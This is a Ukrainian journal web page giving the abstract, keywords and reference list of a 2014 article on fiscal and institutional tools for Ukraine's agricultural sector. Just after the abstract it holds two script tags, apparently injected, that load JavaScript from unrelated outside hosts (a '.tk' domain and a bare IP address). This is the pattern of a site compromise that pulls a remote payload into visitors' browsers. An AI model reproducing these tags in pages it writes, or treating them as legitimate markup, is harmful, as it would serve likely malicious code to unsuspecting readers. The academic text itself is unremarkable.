ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 336.226(422)
Сторінка молодого науковця

Фіскально-інституційні інструменти розвитку аграрного сектору економіки в Україні / Осецька Д. В. // Економіка АПК. - 2014. - № 8 - С. 95

Розкрито теоретичні аспекти фіскально-інституційних інструментів у забезпеченні розвитку та трансформацій аграрного сектору й ролі інститутів у цьому процесі. Досліджено напрями якісних змін у механізмі фіскального та інституційного регулювання аграрного сектору економіки в Україні й запровадження методичних підходів при прийнятті інвестиційних рішень у бюджетно-податковій сфері для системи продовольчого забезпечення. Наголошено на важливості та складності процесу інституціоналізації держави у фіскальному регулюванні сільськогосподарської виробничої діяльності для комплексної оцінки її ефективності в аграрному секторі економіки. З’ясовано, що реформування фіскальних інститутів регулювання аграрного сектору має взаємоузгоджуватися з інституційними змінами в контексті оптимальних теоретичних моделей, які цілком відповідали б реаліям і потребам аграрного ринку. Табл.: 1. Бібліогр.: 23.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: аграрний сектор, бюджетні інвестиції, фіскальне регулювання, інституційне регулювання, інститути, інструменти, податки, продовольча безпека

Список використаних джерел

 1. Геєць В.М. Суспільство, держава, економіка: феноменологія взаємодії та розвитку / В.М. Геєць ; НАН України, Ін-т екон. та прогнозув. – К., 2009. – 864 с.
 2. Єфименко Т.І. Податки в інституційній системі сучасної економіки / Т.І. Єфименко; НАН України, Ін-т екон. та прогнозув. – К., 2011. – 688 с.
 3. Єфименко Т.І. Фіскальний простір антикризового регулювання / Т.І. Єфименко. – К.: ДННУ «Акад. фін. управління», 2012. – 332 с.
 4. Закон України «Про фіксований сільськогосподарський податок» від 17.12.1998р. № 320 – XIV [Електронний ресурс]. – Доступний з: http://zakon4.rada.gov.ua/laws/show/320-14/ed19981217.
 5. Затонацька Т.Г. Бюджетно-податкове регулювання інвестиційної діяльності в Україні : моногр. – К.: Задруга, 2012. – 300 с.
 6. Інноваційні трансформації аграрного сектора економіки : моногр. / [О.В. Шубравська, Л.В. Молдаван, Б.Й. Пасхавер та ін.]; за ред. д-ра екон. наук О.В. Шубравської, НАН України, Ін-т екон. та прогнозув. – К., 2012. – 496 с.
 7. Інституціональні засади трансформацій в аграрній сфері: доп. на Тринадцятих річних зборах Всеукр. конгресу вчених економістів-аграрників 20-21 черв. 2011 року / П. Т. Саблук. – К.: ННЦ «Інститут аграрної економіки», 2011. – 64 с.
 8. К созданию институциональной политической экономики / Р. Буайе, Э. Бруссо, А. Кайе, О. Фавро // Экономическая социология. – 2008. – Т. 9, № 3. – С. 17–24.
 9. Калетнік Г.М. Інститути інфраструктури та ціноутворення у розвитку аграрного ринку: регіональний аспект / Г.М. Калетнік, О.Г. Шпикуляк, Г.О. Пчелянська : монограф. – Вінниця: ТОВ «Фірма «Планер», 2012. – 32 с.
 10. Кваснюк Б.Е. Сучасна парадигма державного регулювання економіки / Б.Е. Кваснюк // Роль держави у довгостроковому економічному зростанні ; за ред. д. е. н. Б. Е. Кваснюка. – К. : Ін-т екон. та прогнозув. – Х.: Форт, 2003. – С. 28–34.
 11. Постсоветский институционализм: десять лет спустя: моногр.: в 2 т. – Т. 2 ; под ред. В.В. Дементьева, Р.М. Нуреева. – Донецк: ГВУЗ «Дон НТУ», 2013. – 472 с.
 12. Стратегічні напрями розвитку сільського господарства України на період до 2020 року ; за ред. Ю.О. Лупенка, В.Я. Месель-Веселяка. – К. : ННЦ «ІАЕ», 2012. – 182 с.
 13. Теорія, політика та практика сільського розвитку ; за ред. д-ра екон. наук, чл.-кор. НАНУ О.М. Бородіної, д-ра екон. наук, чл.-кор. УААН І. В. Прокопи ; НАН України; Ін-т екон. та прогнозув. – К., 2010. – 376 с.
 14. Фінансова система України: взаємодія корпоративного та державного секторів / Т.І. Єфименко, І.О. Лютий, С.С. Гасанов та ін. – К. : ДННУ «Акад. фін. управління», 2012. – 246 с.
 15. Шпикуляк О.Г. Інституції аграрного ринку : [моногр.] / О.Г. Шпикуляк. – К.: ННЦ ІАЕ, 2009. – 480 с.
 16. Bell D. on the Post-Industrial Society // The Public Interest. – 1967. – № 7. – P. 102.
 17. Berg J. external Liberalization, Economic Performance and Social Policy / J. Berg, L. Taylor // Working Paper Series: Globalization, Labor market and Social Policy. – 2000. – Vol. 12, Febr.
 18. Dabrowski M. Disinflation in Transition Economies / M. Dabrowski. – Budapest ; N. Y. : CEU Press, 2000. – 408 p.
 19. Drucker P. The New Productivity Challenge / P. Drucker // Harvard Business Review. – 1991. – № 6. – P. 9–79.
 20. Hanson J. A. Globalization and National Financial Systems: Issues of Integration Systems / ed. By J. A. Hanson, P. Honohan, G. Majnoni. – N. Y. : IBRD, 2003. – P. 1–32.
 21. Kaplan S.N. Investment-Cash Flow Sensitivities are not Valid Measures of Financing Constrains / S.N. Kaplan, L, Zingales // Quarterly Journal of Economics. – 2000. – Vol. 115. – P. 707–712.
 22. Levine R. A Sensitivity Analysis of Cross-Country Growth Regressions / R. Levine, D. Renelt // American Economic Review. – 1992. – Vol. 82, № 4. – P. 942–963.
 23. Stern N. Achievements and Challenges for Sustainable Growth / N. Stern // Dynamic Development in a Sustainable World: Transformation in Quality of Life, Growth and Institutions / ed. By G. Kochendorfer, B. Pleskovic. – Berlin : German Foundation for International Development ; Development Policy Forum, 2002. – P. 15.
Читати статтю: 14_08_95-100.pdf